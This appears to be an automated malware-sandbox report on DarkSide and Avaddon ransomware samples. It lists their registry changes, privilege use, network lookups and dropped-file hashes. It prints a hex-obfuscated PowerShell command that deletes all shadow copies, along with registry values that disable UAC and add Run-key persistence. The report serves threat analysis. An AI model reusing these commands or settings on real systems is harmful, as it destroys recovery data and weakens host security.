2024-07-07 14:39

Platform

win7-20240705-en

Max time kernel

1561s

Max time network

1567s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (179) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\a8e86c8e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\a8e86c8e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.a8e86c8e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.a8e86c8e\ = "a8e86c8e" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\a8e86c8e.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp

Files

memory/2684-5-0x000007FEF665E000-0x000007FEF665F000-memory.dmp

memory/2684-6-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/2684-7-0x0000000002240000-0x0000000002248000-memory.dmp

memory/2684-8-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2684-9-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2684-10-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2684-11-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2684-12-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2684-13-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 febf5feaf0f1361b17ccb6b16e2ffa52
SHA1 a78bf2f756b27e0434d204ad58e1eb51ad1e6998
SHA256 bc0cdc708a1678f40a3ba3334aaeafdcb4b0465a760b83fb39e06eba415c7c83
SHA512 822271f8f733e6ebbe224b45ce590e5b1e1ffd331825b2c986c23adf7d4a8e387473463f2b9722f9ab4c9064a78f513d1648d0f5ada7c1cbf0199ca41924d493

C:\Users\Admin\README.a8e86c8e.TXT

MD5 d4e176b40c4ea17f4870c34fad926d6e
SHA1 2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA256 7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512 feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240705-en

Max time kernel

1799s

Max time network

1445s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

Signatures

Avaddon

ransomware avaddon

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (257) files with added filename extension

ransomware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification \??\Z:\$RECYCLE.BIN\S-1-5-21-2660163958-4080398480-1122754539-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\bckgrd.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\Admin\\bckgrd.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
